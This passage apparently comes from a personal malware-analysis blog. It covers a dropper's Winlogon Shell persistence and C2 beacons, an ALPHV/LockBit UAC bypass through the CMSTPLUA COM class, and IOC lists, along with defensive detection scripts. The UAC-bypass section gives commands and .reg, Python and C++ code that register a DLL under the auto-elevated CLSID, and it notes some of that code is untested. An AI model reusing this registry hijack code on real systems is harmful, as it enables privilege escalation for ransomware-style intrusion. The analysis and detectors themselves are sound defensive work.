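     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive",
     "Details": "C:\\Program Files\\OneDrive\\OneDrive.exe"},
]

# Matches the two Winlogon values that control what runs at logon, in any hive
WINLOGON_RE = re.compile(
    r"\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\(Shell|Userinit)$", re.IGNORECASE)

# Stock values on a default install (assumption of this example); anything else gets reported.
EXPECTED = {
    "shell": {"explorer.exe"},
    "userinit": {"c:\\windows\\system32\\userinit.exe,"},
}


def check_winlogon(event):
    """Return a finding string, or None when the write is not a Winlogon persistence change."""
    if event.get("EventID") != 13:
        return None
    m = WINLOGON_RE.search(event.get("TargetObject", ""))
    if not m:
        return None
    name = m.group(1).lower()
    value = event.get("Details", "").strip().lower()
    if value in EXPECTED[name]:
        return None
    hive = event["TargetObject"].split("\\", 1)[0]
    return (f"{hive} Winlogon\\{m.group(1)} set to {event['Details']!r} "
            f"by {event.get('Image')}")


def scan(events):
    """All findings across a batch of registry events, in the order they were logged."""
    return [f for f in (check_winlogon(e) for e in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_REGISTRY_EVENTS):
        print("-", finding)
```

    The first record is the pattern from the timeline: explorer.exe stays in the value so the desktop still loads, and the dropped binary is appended after a comma so it starts at every logon. The second record is a benign reset and is ignored, and the Run-key write is out of scope for this rule.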

    AnyRun captured a pcap and the DNS output is as follows:

    The first request, sent to safehousenumber (44.221.84[.]105), received a response containing the following bytes:

    The second request is sent to portal.roomshowerbord[.]com (193.166.255[.]171) and the response is received, containing the following bytes:

    Reverse engineering the malware with Ghidra gives the following decompilation:

    void entry(void)
    
    {
      undefined4 *puVar1;
      undefined4 extraout_ECX;
      undefined4 extraout_EDX;
      byte *pbVar2;
      char **local_74;
      _startupinfo local_70;
      int local_6c;
      char **local_68;
      int local_64;
      _STARTUPINFOA local_60;
      undefined *local_1c;
      void *pvStack_14;
      undefined *puStack_10;
      undefined *puStack_c;
      undefined4 local_8;
      
      puStack_c = &DAT_0040f058;
      puStack_10 = &DAT_0040e0a8;
      pvStack_14 = ExceptionList;
      local_1c = &stack0xffffff74;
      local_8 = 0;
      ExceptionList = &pvStack_14;
      __set_app_type(2);
      _DAT_00411de8 = 0xffffffff;
      _DAT_0040f030 = 0xffffffff;
      puVar1 = (undefined4 *)__p__fmode();
      *puVar1 = DAT_0040f040;
      puVar1 = (undefined4 *)__p__commode();
      *puVar1 = DAT_0040f020;
      _DAT_00411ddc = *(undefined4 *)_adjust_fdiv_exref;
      FUN_0040e07a();
      if (DAT_00411de4 == 0) {
        __setusermatherr(&DAT_004185c4);
      }
      FUN_0040e07a();
      _initterm(&DAT_0040f03c,&DAT_0040f03c);
      local_70.newmode = DAT_00411dd0;
      __getmainargs(&local_64,&local_74,&local_68,DAT_00411de0,&local_70);
      _initterm(&DAT_0040f03c,&DAT_0040f03c);
      pbVar2 = *(byte **)_acmdln_exref;
      if (*pbVar2 != 0x22) {
        do {
          if (*pbVar2 < 0x21) goto LAB_0040e01b;
          pbVar2 = pbVar2 + 1;
        } while( true );
      }
      do {
        pbVar2 = pbVar2 + 1;
        if (*pbVar2 == 0) break;
      } while (*pbVar2 != 0x22);
      if (*pbVar2 != 0x22) goto LAB_0040e01b;
      do {
        pbVar2 = pbVar2 + 1;
    LAB_0040e01b:
      } while ((*pbVar2 != 0) && (*pbVar2 < 0x21));
      local_60.dwFlags = 0;
      GetStartupInfoA(&local_60);
      GetModuleHandleA((LPCSTR)0x0);
      local_6c = FUN_0040dee8(extraout_ECX,extraout_EDX);
                        /* WARNING: Subroutine does not return */
      exit(local_6c);
    }

    This entry function is the C runtime startup routine that:

    1. Sets up exception handling.
    2. Configures the application type as a console app.
    3. Initializes global variables (e.g., file mode, floating-point settings).
    4. Runs initializers (e.g., C++ constructors) via _initterm.
    5. Retrieves and parses command-line arguments.
    6. Gathers startup information.
    7. Calls the user-defined main function (FUN_0040dee8).
    8. Exits with main’s return value.

    We would need the dropped binary to see what the real malware does.

    OSINT

    Filename: 7zsfx.exe
    VirusTotal Score: 18/43
    MD5: 3aeb8c1edb3810196a3eff1c7a4188b2
    SHA1: f117f6cbdc33cace7ee8026f8eebfc7a04a58a3c
    SHA256: 0477e8fa82354dc04fc44a23a05b069909aa5525f3ea474c2217a5a16a734aa2

    VirusTotal upload shows the file is not signed but has a Product description of “Trend Micro AntiVirus Plus AntiSpyware”. It is categorized as part of the armadillo malware family.

    slade.safehousenumber[.]com
    9/94, https://www.virustotal.com/gui/domain/slade.safehousenumber.com
    URLScan reaches the domain but produces a blank white page: https://urlscan.io/result/019567f0-6bd6-7669-976e-9da47cfe8b30/

    44.221.84[.]105
    1/94, https://www.virustotal.com/gui/ip-address/44.221.84.105
    IP is AWS owned and serves many other domains — both legitimate and malicious.
    URLScan also shows a blank page: https://urlscan.io/result/01956809-0a45-7eed-925f-fe6e637b1665/

    portal.roomshowerbord[.]com
    5/94, https://www.virustotal.com/gui/domain/portal.roomshowerbord.com
    Known malware C2 domain.

    193.166.255[.]171
    2/94, https://www.virustotal.com/gui/ip-address/193.166.255.171
    Large Finnish ISP that provides hundreds of resolutions.
    URLScan shows the IP does not provide a web page: https://urlscan.io/result/01956a2a-e667-7bb8-9f13-23e97f7e4d0f/

    Conclusion

    Malware reaches out to C2 for second stage but these are no longer functioning — even though the domains are still alive.

    IOCs

    44.221.84[.]105

    193.166.255[.]171

    portal.roomshowerbord[.]com

    slade.safehousenumber[.]com

    0477e8fa82354dc04fc44a23a05b069909aa5525f3ea474c2217a5a16a734aa2

  • ALPHV vs Defense Contractors: UAC bypass analysis

    Unimportant Intro Stuff

    It was reported yesterday that Ultra Intelligence & Communications, a subsidiary of the British defense contractor Ultra, was ransomed by the ALPHV ransomware gang. Leaked info involved contract info with NATO members (i.e., US, Israel, Switzerland). Switzerland’s DoD confirmed that the compromise affected the Swiss Air Force.

    With experience in this space, I can testify that DoD contractors are very aware of this risk. Yes, the contracts can be very lucrative and the work can be very fulfilling (depending on the mission), but you are always precariously hanging over the fire of “contract renegotiation” and one mistake can tank the entire business. Sucks for Ultra employees if this tanked them. But there are no tears shed for the military industrial complex.

    Back to the hack: CloudSEK published an analysis report of the ALPHV ransomware binary a month after the Ultra hack. Not sure if it was the same version used, but it’s definitely good enough for analysis reference.

    UAC bypass stuff

    How the heck does UAC bypass still happen in 2024?! It blows my mind that this is still allowed to happen. But whatever.

    The author of the aforementioned report, Hansika Saxena — shoutout! — showed that the Threat Actor used CoGetObject to register the ransomware with the CLSID (global COM class object ID) {3E5FC7F9-9A51-4367-9063-A120244FBEC7}. This is the CMSTPLUA interface. What is that? Grok says it’s related to the Connection Manager component and that it’s an “auto-elevated COM object”, meaning, “it can execute commands with higher privileges”.

    Connection Manager uses cmstplua.dll. It is used for installing connection manager service profiles. This functionality has been in Windows since before the Windows 7 introduction of UAC.

    @bohops back in 2018 mentioned that one way to run this via CMD would be rundll32.exe /sta {CLSID}. The /sta stands for Single Threaded Apartment. I don’t know what that means (I’m not a Windows guy), but I’ll look into it later.

    You can also use PowerShell:

    $comObject = New-Object -ComObject {CLSID}
    # Here you would need to know the exact method or property of the COM object that can execute or launch an .exe

    CISA also reported LockBit using the same UAC bypass methodology last year. LockBit used the following way to assign the CLSID:

    %SYSTEM32%\dllhost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}

    A dumb way of doing this is by manually writing a registry file (test.reg) and then running it:

    Windows Registry Editor Version 5.00
    
    [HKEY_CLASSES_ROOT\CLSID\{3E5FC7F9-9A51-4367-9063-A120244FBEC7}]
    @="Test Class"
    
    [HKEY_CLASSES_ROOT\CLSID\{3E5FC7F9-9A51-4367-9063-A120244FBEC7}\InprocServer32]
    @="C:\\Path\\To\\Your\\test.dll"
    "ThreadingModel"="Both"
    

    Another way is by using python:

    import winreg as reg
    
    # Define the CLSID and path to your DLL
    clsid = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
    dll_path = r"C:\Path\To\Your\test.dll"
    
    # Track both handles so the cleanup below only closes keys that were actually opened
    key = None
    inproc_key = None
    
    # Create the registry keys (CreateKey on HKEY_CLASSES_ROOT writes to the machine hive,
    # so this needs an elevated prompt)
    try:
        # Open the key, or create it if it doesn't exist
        key = reg.CreateKey(reg.HKEY_CLASSES_ROOT, f"CLSID\\{clsid}")
        reg.SetValue(key, "", reg.REG_SZ, "Test Class")
        
        inproc_key = reg.CreateKey(key, "InprocServer32")
        reg.SetValue(inproc_key, "", reg.REG_SZ, dll_path)
        reg.SetValueEx(inproc_key, "ThreadingModel", 0, reg.REG_SZ, "Both")
        
        print("CLSID assigned successfully.")
    except Exception as e:
        print(f"Error: {e}")
    finally:
        # If CreateKey failed, the names would be unbound and CloseKey would raise NameError
        if inproc_key is not None:
            reg.CloseKey(inproc_key)
        if key is not None:
            reg.CloseKey(key)

    And finally in C++ (per Copilot. I’ll test it later):

    #include <windows.h>
    #include <wchar.h>   // wcslen

    int main()
    {
        HKEY hKey;
        LPCWSTR clsid = L"CLSID\\{3E5FC7F9-9A51-4367-9063-A120244FBEC7}";
        LPCWSTR inproc = L"CLSID\\{3E5FC7F9-9A51-4367-9063-A120244FBEC7}\\InprocServer32";
        LPCWSTR dllPath = L"C:\\Path\\To\\Your\\test.dll";

        // Create the CLSID key and set its default value (a NULL value name means "(Default)").
        // Creating under HKCR writes to HKLM\Software\Classes, so this needs an elevated process.
        if (RegCreateKeyExW(HKEY_CLASSES_ROOT, clsid, 0, NULL, 0, KEY_WRITE, NULL, &hKey, NULL) == ERROR_SUCCESS)
        {
            // sizeof() of a wide string literal already includes the terminating NUL
            RegSetValueExW(hKey, NULL, 0, REG_SZ, (const BYTE*)L"Test Class", sizeof(L"Test Class"));
            RegCloseKey(hKey);
        }
        else
        {
            return 1;   // typically ERROR_ACCESS_DENIED when not elevated
        }

        // Create the InprocServer32 key; its default value is the DLL COM loads for this class
        if (RegCreateKeyExW(HKEY_CLASSES_ROOT, inproc, 0, NULL, 0, KEY_WRITE, NULL, &hKey, NULL) == ERROR_SUCCESS)
        {
            RegSetValueExW(hKey, NULL, 0, REG_SZ, (const BYTE*)dllPath, (DWORD)((wcslen(dllPath) + 1) * sizeof(WCHAR)));
            RegSetValueExW(hKey, L"ThreadingModel", 0, REG_SZ, (const BYTE*)L"Both", sizeof(L"Both"));
            RegCloseKey(hKey);
        }
        else
        {
            return 1;
        }

        return 0;
    }
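
    As an added example (my code, not from the original post or any of the tools it cites), here is the defender's side of the same registry structure: a parser for the .reg export format used above and a check that flags CLSID server registrations which load code from outside the Windows system directories, or a per-user HKCU\Software\Classes registration that shadows a machine-wide one (the COM hijack pattern). The sample export is constructed: it puts the dllhost.exe LocalServer32 line for the CMSTPLUA class next to a hypothetical per-user InprocServer32 pointing at C:\Users\admin\test.dll. The expansion of %SystemRoot% to C:\Windows is an assumption of the script.

```python
import re

# Constructed sample .reg export (not taken from the original post). The machine-wide
# LocalServer32 line mirrors the dllhost.exe surrogate CISA lists for CMSTPLUA; a real export
# stores it as REG_EXPAND_SZ (hex(2):...), which this small parser does not decode, so it is
# written here as a plain string. The HKCU InprocServer32 is a hypothetical per-user override.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3E5FC7F9-9A51-4367-9063-A120244FBEC7}]
@="CMSTPLUA"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3E5FC7F9-9A51-4367-9063-A120244FBEC7}\LocalServer32]
@="%SystemRoot%\\system32\\dllhost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{3E5FC7F9-9A51-4367-9063-A120244FBEC7}]
@="Test Class"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{3E5FC7F9-9A51-4367-9063-A120244FBEC7}\InprocServer32]
@="C:\\Users\\admin\\test.dll"
"ThreadingModel"="Both"
'''

_VALUE_RE = re.compile(r'^(@|"(?P<name>(?:[^"\\]|\\.)*)")=(?P<data>.*)$')
_SERVER_KEY_RE = re.compile(
    r'^(?P<hive>HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER\\Software\\Classes)'
    r'\\CLSID\\(?P<clsid>\{[0-9A-F-]{36}\})\\(?P<server>InprocServer32|LocalServer32)$',
    re.IGNORECASE,
)
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def _unescape(s: str) -> str:
    # .reg files escape a backslash as two backslashes and a double quote as backslash-quote
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text: str) -> dict:
    """Parse a .reg export into {key_path: {value_name: data}}; '@' is the default value.

    Only quoted REG_SZ values are decoded; dword:/hex(...) values are kept as raw text.
    """
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m is None or current is None:
            continue  # continuation lines of hex blobs etc.
        name = "@" if m.group(1) == "@" else _unescape(m.group("name"))
        data = m.group("data")
        if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
            data = _unescape(data[1:-1])
        keys[current][name] = data
    return keys


def server_image(data: str) -> str:
    """Pull the executable/DLL path out of a LocalServer32/InprocServer32 default value."""
    # Assumption: SystemRoot is C:\Windows. On a live host expand the variable instead.
    s = re.sub(r"%(SystemRoot|windir)%", r"C:\\Windows", data.strip(), flags=re.IGNORECASE)
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]  # unquoted: first token (unquoted paths with spaces get cut)


def com_server_findings(keys: dict) -> list:
    """Return (clsid, hive, server_type, image, reason) for suspicious CLSID registrations."""
    by_clsid = {}
    for path in keys:
        m = _SERVER_KEY_RE.match(path)
        if m:
            by_clsid.setdefault(m.group("clsid").upper(), []).append((m, path))
    findings = []
    for clsid, entries in by_clsid.items():
        hives = {m.group("hive").upper().split("\\")[0] for m, _ in entries}
        for m, path in entries:
            hive = m.group("hive").upper().split("\\")[0]
            image = server_image(keys[path].get("@", ""))
            if not image.lower().startswith(TRUSTED_DIRS):
                findings.append((clsid, hive, m.group("server"), image,
                                 "server image outside the Windows system directories"))
            if hive == "HKEY_CURRENT_USER" and hives & {"HKEY_LOCAL_MACHINE", "HKEY_CLASSES_ROOT"}:
                findings.append((clsid, hive, m.group("server"), image,
                                 "per-user registration shadows a machine-wide CLSID (COM hijack pattern)"))
    return findings


if __name__ == "__main__":
    for f in com_server_findings(parse_reg(SAMPLE_REG)):
        print("[!] %s %s %s -> %s: %s" % f)
```

    Run against a real export (reg export HKCU\Software\Classes\CLSID user.reg, then the same for HKLM) the two checks cover the cheap cases: a class whose server lives under a user profile, and a user-writable registration sitting in front of a system one. The REG_EXPAND_SZ decoding is deliberately left out here; a production version would decode the hex(2) form rather than rely on plain-string exports.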
    

    A quick Google search shows this bypass is nothing new and has been used for 3+ years by ransomware gangs, including LockBit (Hello, my little buddies!))). HOW THE HECK IS THIS STILL HAPPENING????

  • shakira.exe Analysis

    This is more or less a part two to the naprava.exe analysis. Turns out the SD card holds many malicious surprises.

    Again, this is a 14-year-old malware executable from Moldova that was inadvertently stored on an SD card.

    Analysis

    shakira.exe loads the following DLLs, and finally spawns a child process, in chronological order (offsets are relative to process start):

    • +46 ms
      • ntdll.dll
      • kernel32.dll
    • +62 ms
      • KernelBase.dll
      • user32.dll
      • gdi32.dll
      • lpk.dll
      • usp10.dll
      • msvcrt.dll
    • +78 ms
      • C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
      • advapi32.dll
      • sechost.dll
      • rpcrt4.dll
      • oleaut32.dll
      • ole32.dll
      • shell32.dll
      • shlwapi.dll
      • imm32.dll
      • msctf.dll
    • +203 ms
      • apphelp.dll
    • +218 ms
      • svchost.exe (child process, not a DLL)

    The executable spawns svchost.exe, which drops another executable, C:\Users\admin\xuat.exe. xuat.exe then sets the Shell value under HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon to explorer.exe,C:\Users\admin\xuat.exe. Winlogon launches every comma-separated program listed in Shell at logon, and the only default entry is explorer.exe, so this makes xuat.exe start alongside Explorer on every logon and reboot: that is the dropper's persistence. Because it is the per-user (HKCU) key, no admin rights were needed to write it. The process then reads a number of registry entries relating to network configuration.
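
    As an added example (my code, not from the original post), here is a check for exactly this kind of Winlogon Shell persistence. It treats anything in the Shell value other than explorer.exe as a finding, tolerates quoting, full paths and trailing commas, and looks at both the HKLM and HKCU copies of the key because the sample used the per-user one. The registry data it runs over is constructed to mirror what the sandbox trace shows.

```python
# Constructed sample (not real registry dumps): HKLM left at its default, HKCU modified
# the way the any.run trace shows xuat.exe doing it.
SAMPLE_WINLOGON = {
    "HKEY_LOCAL_MACHINE": {"Shell": "explorer.exe"},
    "HKEY_CURRENT_USER": {"Shell": "explorer.exe,C:\\Users\\admin\\xuat.exe"},
}

DEFAULT_SHELL = "explorer.exe"


def _normalise(entry: str) -> str:
    """Strip quotes/whitespace and reduce a path to its lower-cased file name."""
    e = entry.strip().strip('"').strip()
    return e.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rogue_shell_entries(shell_value):
    """Return the entries of a Winlogon Shell value that are not explorer.exe.

    Winlogon launches every comma-separated program listed in Shell, and the only
    legitimate default is explorer.exe, so anything else is a persistence candidate.
    None (value absent) means the built-in default applies and is treated as clean.
    """
    if shell_value is None:
        return []
    rogue = []
    for entry in shell_value.split(","):
        if not entry.strip():
            continue  # tolerate trailing commas
        if _normalise(entry) != DEFAULT_SHELL:
            rogue.append(entry.strip())
    return rogue


def check_winlogon(hives: dict) -> list:
    """hives: {hive_name: {value_name: data}} for the Winlogon key in HKLM and HKCU.

    Returns a list of (hive, entry) findings. HKCU is checked as well as HKLM because
    a per-user Shell value is honoured and needs no admin rights to write.
    """
    findings = []
    for hive, values in hives.items():
        for entry in rogue_shell_entries(values.get("Shell")):
            findings.append((hive, entry))
    return findings


if __name__ == "__main__":
    for hive, entry in check_winlogon(SAMPLE_WINLOGON):
        print(f"[!] {hive}\\...\\Winlogon\\Shell also launches {entry}")
```

    On a live host the two dicts would come from reading the Winlogon key in each hive (winreg on Windows, or a parsed hive/.reg export offline); the logic is the same either way.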

    At +906 ms the process connects to 44.221.84[.]105:33111 (slade.safehousenumber[.]com) and sends 21 bytes over UDP.

    At +120 seconds, the xuat.exe process connects to 193.166.255[.]171:33111 (portal.roomshowerbord[.]com) and again sends 21 bytes over UDP.

    At +128 seconds, the Windows Media Player Network Sharing Service Configuration Application (C:\Program Files\Windows Media Player\wmpnscfg.exe) runs in the background and gathers client information (reads the computer name, checks supported languages, and other sysinfo). wmpnscfg.exe is a stock Microsoft component, so its activity in the sandbox is not by itself attributable to the malware.

    At +151 seconds, xuat.exe connects to 44.221.84[.]105:33111 (slade.safehousenumber[.]com) once more and sends another 21 bytes over UDP.

    The malware appears to gather system information and check in with its C2 servers; the fixed 21-byte datagram size and the same port on both hosts look like a periodic beacon.

    Ghidra produced the following decompiled output for the entry point. This is not the malware logic yet: it is the stock MSVC CRT startup stub (__set_app_type, __getmainargs, _initterm, then GetStartupInfoA). The three small loops walk _acmdln past the program name, quoted or not, and the whitespace after it to compute the lpCmdLine that WinMain receives, and FUN_004109ec is where control passes to the program's own WinMain, so that is the function to follow next:

    void entry(void)
    
    {
      undefined4 *puVar1;
      undefined4 extraout_ECX;
      uint extraout_EDX;
      byte *pbVar2;
      char **local_74;
      _startupinfo local_70;
      int local_6c;
      char **local_68;
      int local_64;
      _STARTUPINFOA local_60;
      undefined *local_1c;
      void *pvStack_14;
      undefined *puStack_10;
      undefined *puStack_c;
      undefined4 local_8;
      
      /* SEH frame setup for the CRT startup code */
      puStack_c = &DAT_00412058;
      puStack_10 = &DAT_0041148c;
      pvStack_14 = ExceptionList;
      local_1c = &stack0xffffff6c;
      local_8 = 0;
      ExceptionList = &pvStack_14;
      __set_app_type(2);
      _DAT_00412038 = 0xffffffff;
      _DAT_00412078 = 0xffffffff;
      puVar1 = (undefined4 *)__p__fmode();
      *puVar1 = DAT_0041214c;
      puVar1 = (undefined4 *)__p__commode();
      *puVar1 = DAT_0041206c;
      _DAT_00412070 = *(undefined4 *)_adjust_fdiv_exref;
      FUN_0041147b();
      if (DAT_0041208c == 0) {
        __setusermatherr(&DAT_00412254);
      }
      FUN_0041147b();
      _initterm(&DAT_00412090,&DAT_00412090);
      local_70.newmode = DAT_00412020;
      __getmainargs(&local_64,&local_74,&local_68,DAT_00412080,&local_70);
      _initterm(&DAT_00412090,&DAT_00412090);
      /* Compute lpCmdLine: skip argv[0] (0x22 is '"', bytes < 0x21 are whitespace/NUL) */
      pbVar2 = *(byte **)_acmdln_exref;
      if (*pbVar2 != 0x22) {
        /* unquoted program name: run to the first whitespace or NUL */
        do {
          if (*pbVar2 < 0x21) goto LAB_0041140f;
          pbVar2 = pbVar2 + 1;
        } while( true );
      }
      /* quoted program name: run to the closing quote (or NUL if unterminated) */
      do {
        pbVar2 = pbVar2 + 1;
        if (*pbVar2 == 0) break;
      } while (*pbVar2 != 0x22);
      if (*pbVar2 != 0x22) goto LAB_0041140f;
      /* skip the whitespace between argv[0] and the arguments */
      do {
        pbVar2 = pbVar2 + 1;
    LAB_0041140f:
      } while ((*pbVar2 != 0) && (*pbVar2 < 0x21));
      local_60.dwFlags = 0;
      GetStartupInfoA(&local_60);
      GetModuleHandleA((LPCSTR)0x0);
      /* hand-off to the program's WinMain; the real behaviour lives in here */
      local_6c = FUN_004109ec(extraout_ECX,extraout_EDX);
                        /* WARNING: Subroutine does not return */
      exit(local_6c);
    }
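
    To make sure I read those three loops correctly, here is a Python re-implementation of them as an added example (my code, not from the original post or from the sample). It reproduces the decompiled control flow byte for byte, including the goto into the middle of the last loop, and the command lines it is run on are constructed.

```python
QUOTE = 0x22        # '"'
SPACE_LIMIT = 0x21  # bytes below this (space and control characters) count as whitespace


def crt_cmdline_after_program(cmdline: bytes) -> bytes:
    """Return the command line with argv[0] and the whitespace after it removed.

    Mirrors the decompiled entry() logic exactly:
      * unquoted program name: advance until a byte < 0x21 (whitespace or NUL);
      * quoted program name: advance to the closing quote, or stop at NUL if unterminated;
      * then skip whitespace and return the remainder (what WinMain sees as lpCmdLine).
    """
    n = len(cmdline)

    def at(i: int) -> int:  # emulate the C string's NUL terminator
        return cmdline[i] if i < n else 0

    i = 0
    if at(i) != QUOTE:
        while at(i) >= SPACE_LIMIT:  # first loop: run to whitespace/NUL
            i += 1
    else:
        i += 1                       # second loop: scan for the closing quote
        while at(i) != 0 and at(i) != QUOTE:
            i += 1
        if at(i) == QUOTE:
            i += 1                   # step past the closing quote ...
        # ... otherwise NUL was hit: same as the goto LAB_0041140f with an empty remainder
    while at(i) != 0 and at(i) < SPACE_LIMIT:  # third loop: skip whitespace
        i += 1
    return cmdline[i:]


if __name__ == "__main__":
    # constructed command lines, not captured from the sample
    for cl in (b'"C:\\Users\\admin\\xuat.exe" /install',
               b'xuat.exe   foo bar',
               b'"unterminated'):
        print(repr(cl), "->", repr(crt_cmdline_after_program(cl)))
```

    Seeing that the output is just the arguments after the program name confirms the block is boilerplate and that the next stop in Ghidra is FUN_004109ec.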

    OSINT

    shakira.exe
    a94ccc4af328865384badd276d1f1a4bb38fa83edc006ad275b1f767eaf17c53
    53/64, https://www.virustotal.com/gui/file/a94ccc4af328865384badd276d1f1a4bb38fa83edc006ad275b1f767eaf17c53
    Associated with the Armadillo malware packer.

    xuat.exe
    a94ccc4af328865384badd276d1f1a4bb38fa83edc006ad275b1f767eaf17c53
    Identical hash to shakira.exe: xuat.exe is a straight copy of the original dropped into the user profile.

    slade.safehousenumber[.]com
    9/94, https://www.virustotal.com/gui/domain/slade.safehousenumber.com
    GoDaddy registered domain known for phishing.

    murik.portal-protection.net[.]ru
    3/94, https://www.virustotal.com/gui/domain/murik.portal-protection.net.ru
    Domain registered with Russian registrar RU-CENTER-RU. Known malware domain.

    banana.cocolands[.]su
    5/94, https://www.virustotal.com/gui/domain/banana.cocolands.su
    Registered with NIC.ru domain registrar. Known malware domain.

    portal.roomshowerbord[.]com
    5/94, https://www.virustotal.com/gui/domain/portal.roomshowerbord.com
    Domain registered with GoDaddy. Known malware domain.

    44.221.84[.]105
    1/94, https://www.virustotal.com/gui/ip-address/44.221.84.105/details
    Allocated to Amazon in the US, but flagged in association with malware.

    193.166.255[.]171
    2/94, https://www.virustotal.com/gui/ip-address/193.166.255.171
    Finnish IP serving phishing domains.

    Conclusion

    Definitely similar to naprava.exe. Maybe the same threat actor wrote this malware, which I contracted at the Chisinau, Moldova internet cafe.

    Indicators of Compromise

    AnyRun link: https://app.any.run/tasks/abdd8821-c4aa-4f97-9d86-4eb5f1983023
    File path: ..\havesit\shakira.exe
    File name: shakira.exe
    SHA256: a94ccc4af328865384badd276d1f1a4bb38fa83edc006ad275b1f767eaf17c53
    C2 domain: slade.safehousenumber[.]com
    C2 domain: murik.portal-protection.net[.]ru
    C2 domain: banana.cocolands[.]su
    C2 domain: portal.roomshowerbord[.]com
    C2 IP: 44.221.84[.]105
    C2 IP: 193.166.255[.]171